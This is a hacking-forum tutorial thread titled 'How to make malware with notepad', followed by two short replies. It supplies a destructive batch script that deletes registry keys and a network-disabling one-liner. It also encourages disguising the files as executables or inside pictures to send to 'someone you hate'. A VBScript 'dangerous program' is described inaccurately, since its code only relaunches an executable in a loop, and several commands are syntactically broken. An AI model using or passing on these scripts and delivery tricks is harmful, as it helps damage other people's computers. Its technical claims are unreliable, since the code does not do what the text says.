ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements

How to make malware with notepad.

by TheCoder - 11-19-2018 - 04:36 PM
TLDR: Intro
     There are several ways to make malware nowadays, everything from script kiddie programs to basic computer functions. I'll be showing you, in detail, how to make your own viruses, using examples, giving tips, and relaying useful info. This tutorial is mostly for beginners, but I hope those of you out there who have been making viruses discover something that they didn't know before.

DISCLAIMER: The programs I'm about to show you are very dangerous Nice and may destroy any machine they are run on.

To start your program you may want to put "@echo off" as your first command, this will hide command prompt while the program runs. You don't really need to know very much programming language to get your malicious program going, most full commands start with a basic command prompt command and then parameters such as del (name) but as you get deeper into commands they will get a little more complex. a good starter program is:

@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

super simple super devastating, this will delete all of the registry files which will make the machine a vegetable. you can find a huge list of commands and what they do right here

Once you have figured out command prompt and found someone you hate you can type up something as simple as that last program I showed you, save it as .bat (batch) rather than .txt (text) once you are done doing that, you can convert it to .exe (executable) using this or you could hide your .bat or .exe in a picture so that you can send a picture to someone then BLAM their machine is fried.

There are some commands that are pretty harmless too such as:

@echo off
Ipconfig /release

This will shut off the internet until the machine restarts or the user goes to cmd and types ipconfig /enable. And there are some commands that are fun, like the one where you can watch star wars in command prompt. or you can make your own adventure game(You'll have to find another tutorial for that tho)

And I suppose the most "dangerous" program I can think of would be:

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

This bad boy will delete key startup registry files once it is run and the pc is turned off, and will not allow the pc to start up, the only catch is that you have to save your file as .vbs (visual basic) rather than .bat

You can find plenty of premade 'scripts' for your convenience in the rest of the world wide web

This is for learning only, I do not condone the use of scripts for malicious purposes. I advise against the use of any knowledge I've shared with you for any purpose, and please be safe with these.
Rockon Tounge Nice
"Beware of me XV of the Tarot for you are but XXII."
Angry Angry Angry
This is very basic anyone that opens a batch file without viewing its contents shouldn't even own a PC.
(11-19-2018 - 04:52 PM)jay360mods Wrote: This is very basic anyone that opens a batch file without viewing its contents shouldn't even own a PC.

If you convert the batch to executable and hide it in a mess of files, there usually isn't a problemo
"Beware of me XV of the Tarot for you are but XXII."
Angry Angry Angry

Users browsing: 1 Guest(s)